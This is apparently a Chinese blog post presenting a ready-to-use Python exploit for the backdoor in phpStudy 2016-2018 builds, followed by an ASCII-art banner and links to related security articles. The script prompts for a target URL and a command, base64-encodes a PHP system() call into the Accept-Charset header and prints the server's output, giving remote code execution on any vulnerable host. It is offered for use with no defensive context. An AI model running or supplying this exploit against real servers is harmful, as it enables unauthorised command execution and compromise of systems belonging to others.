[2016-2018]phpstudy的exp制作

[2016-2018]phpstudy的exp制作

用python的requests模块进行编写

修改请求数据包进行远程代码执行

python 复制代码
import requests
import base64
def remove_code_execute():
    try:
        url = input("请输入要测试的网址:")
        cmd = input("想要执行的命令:")
        cmd = f"system('{cmd}');"
        cmd = base64.b64encode(cmd.encode()).decode()

        headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36",
            "accept-encoding": "gzip,deflate",
            "accept-charset": f"{cmd}"
        }
        response = requests.get(url=url,headers=headers)
        relust=response.content.decode("GBK")[:response.content.decode("GBK").find("<!D"):1]
    except Exception:
        print("请检查是否是url错误或者命令错误")
        print("请检查操作系统和命令是否匹配")
    else:
        print(f"命令执行结果:\n{relust}")
print("""
        PHPStudy_2016-2018

.............................................:.:..............................................tt,..t
..........................................:tfjjjft:...........................................itt::.
.........................................;fLLLGGLfjt,:.........................................;tj,.
.........:.:.....:.....................:;fLLGGDDGLLfjt:.........................................;ttt
......:.... ........... ...............,fLGGGDEEDGGGGf,..........................................,tt
..##i###.  W:::...L...jjLKff...........:fGDDDDDEDDGGGL,......:. . ...;D.....::...:,:...:....:..t....
..f..L##.# ::.#####WW.itEii ............LDDDGGGjLDEDGfj......jf.,,E L.W##K##W#W#itWjfft#W###Wif#fjjt
...i.jE,:j:iG .:..W...;;D;;;............LGDDDGLjjGEDfi:......# .. D.#L,#::.,Df.::::.K..:iLE...,. G..
...#.. ,.f.jL.,:.#::. .:E...............iGDDDGLfGDDL..........#.::,D#.E#G..#.K.. #L###..#.#:..#EWW#.
..i:fLf,:Lt:L.W E: G.:.:ji::...........:.tGjGGfjLfjf..........;:..L:#: #.;W#####tK..K:.######j#.:D:.
.. ...##.f.##.:#: j.;;#: :K#..............Liiii;tit:........ #..:.E.#i:W.,:.#iW::W,:K,,:.#tE::#,;D:,
........................................jKi;ii;,iit.............,i. G:t,.:D:...j.L.....D:...;.L.....
......................................DEWKKjiiijti..................:.:....:... .:......:.....::....
.....................................:EKKWWEijLfftL,i................ .....:. :.....................
.................................jKKD::KKWWKGtjjtDW:fE,.......####.:..#.. .:t.E.....................
................................iKKKKD:DWWWWWf;itWKL:KKG:.....WWWK.,ii#iit...,:.....................
...............................:KKKKKKiiWWKWWWKKWWKE:KKKK:....###W....W:.:.,,;,;....................
..............................:EKKKKKKE;WWWEKWWWWWWE:KKKKK:..######..::.. :,,;,,....................
...............................KKKKKKKWiWWWWKKKWWWWD,KKKWKK...K.##K::#:L .ii;Eit....................
..............................tKKKKKWWWiWWWWWWWKKKEjfGKWWWW::L Gi,:.#:E.Dj.L;:#:....................
.............................:KKKWWKWWWjWWWWWWWWWWW;WWEWWWWK;:..:.:.:..:....:: .:...................
............................,KKWWWWWWWEKWWWWWWWWWWLjWWWWWWWKWD......................................
.........................:KKKWWWWWWWjfWWWWWWWWWWDLKW.,DWWWWWKKKKKKKG:...............................
.......................GKKKKWWWWWLiEWWWWWWWWWWt;..............:LWKKKKKKKKE:.........................
.....................:jKWKKKWWWWfiDWWWWWWWWWWG,.................:jWKKKKKKKKi........................
.....................;KKKKKWWWWLtGWWWWWWWWWWDi...................:.iKKWKKKKKG.......................
....................,EKKKKKKKWWGLWWWWWWWWWKLL:......................:fWWKKKKK.......................
...................:LKKKKWELLGLEWWWWWWWWWKEj.......................,tititLKEEj:.....................
..................:iKKKKKLfffLGEDDEKKKKEEED:......................itttiiiiL;iD......................
..................,KKKKKj.jffLLGDGGGDGGDDDEEt....................jjtttiiiij;Li......................
.................,GKKKK;::fLLGGGGGGGDGGDDDDDG,.................:.jjtLiiiittjLt......................
,:.............,GKWE;:...:GGGGGGGGGGGGGGGGGGG;..................Ljjjttttftjjfi......................
,,:...........,LWKK;:....:LGGGLLLLLLLLLLLLGLLt..................GffjjjjLjjjfLt:.....................
,,,,:........:iKKKf:......fffLLLLLLLLLLLLLLLff:.................tfLfjjfLjfffL,...............::.::..
,,,,,........,GKWWt:......fffLLLGGGLLLLLLLffffj.................:LLfffLffffL;................::.::..
,,,,,,:......,KKWWi......:ffffLGGGGGGLLLLLLffff..................;LLLLfffLLj.................::.....
,,,,,,,:...:,;;LWK;.......ffffffLLDEGDDGGLLfffji:.................iGLLLLLLt.........................
,,,,,,,,:..:i;;iii:.......fffffffLG:.DDDGLLffjjj:.................:.tLLGf:......:::.................
,,,,,,,,,::;iii,:;:.......LffffffLL..fDDGLLLffjj;..................:.:.:....:.....:.................
,,,,,,,,,,,,ii;:,;:.......;fffjjjfL...EDGGLLfjjjj.....................................::.........:..
,,,,,,,,,,,ii;,::;:........fffjjjfL...tGGGLffjjjj:............:.....................................
,,,,,,,,,,,ii,,...:........fffjjjfL...:GGGLffjjjjt................:::...............................
,,,,,,,,,,,,;;,............jfjjjjjL.....GGLLfjjjjf............:.........:.........................::
,,,,,,,,,,,,,,,............;fjjjjjf...::jGLLffjjjf......................:.........................::
,,,,,,,,,,,,,,,,:...........fjjjjjf:.....GLLffjjjj;.........:,;.WG,:j:W...........D:f. ...........::
,,,,,,,,,,,,,,,,,:..........jjjjjjj;...:.,LLffjjjjf...........:.t.::W,   ,WW#WW#,..K..:.:......:::..
,,,,,,,,,,,,,,,,,,:.........jjjjjjjj...:..tLffjjjff..........fK..#:jW..W.,.:fi:::..K..:.::...::::...



                                                    --xl
        frist : please your url
        sec   : please input your command
        """)
remove_code_execute()
相关推荐
久绊A22 天前
WordPress Fontsy Plugin SQL注入漏洞深度剖析与防御指南
安全·漏洞
niaiheni25 天前
CTF 漏洞利用实战:五个典型案例深度解析
网络安全·php·ctf·rce
独角鲸网络安全实验室1 个月前
WhisperPair漏洞突袭:谷歌Fast Pair协议失守,数亿蓝牙设备陷静默劫持危机
网络安全·数据安全·漏洞·蓝牙耳机·智能设备·fast pair·cve-2025-36911
白帽子凯哥哥1 个月前
网络安全Web基础完全指南:从小白到入门安全测试
前端·sql·web安全·信息安全·渗透测试·漏洞
独角鲸网络安全实验室1 个月前
本地信任成“致命漏洞”:数千Clawdbot Agent公网裸奔,供应链与内网安全告急
网络·网关·安全·php·漏洞·clawdbot·信任机制漏洞
DarkAthena1 个月前
【GaussDB】合入原生PG的PR来修复CVE-2025-1094漏洞后产生的严重隐患
数据库·漏洞·gaussdb
\xin1 个月前
SQL 注入、文件上传绕过、MySQL UDF 提权、SUID 提权、Docker 逃逸,以及 APT 持久化技术渗透测试全流程第二次思路
sql·mysql·docker·容器·渗透测试·json·漏洞
IT 青年1 个月前
Apache Struts XWork 组件 XXE 漏洞(CVE-2025-68493)[已复现]
漏洞·struts2
Jerry_Gao9212 个月前
【成长笔记】【web安全】深入Web安全与PHP底层:四天实战课程笔记
笔记·安全·web安全·php·漏洞
独角鲸网络安全实验室2 个月前
CVE-2025-61882深度分析:Oracle Concurrent Processing BI Publisher集成远程接管漏洞的技术原理与防御策略
数据库·网络安全·oracle·漏洞·ebs·cve-2025-61882·xml 注入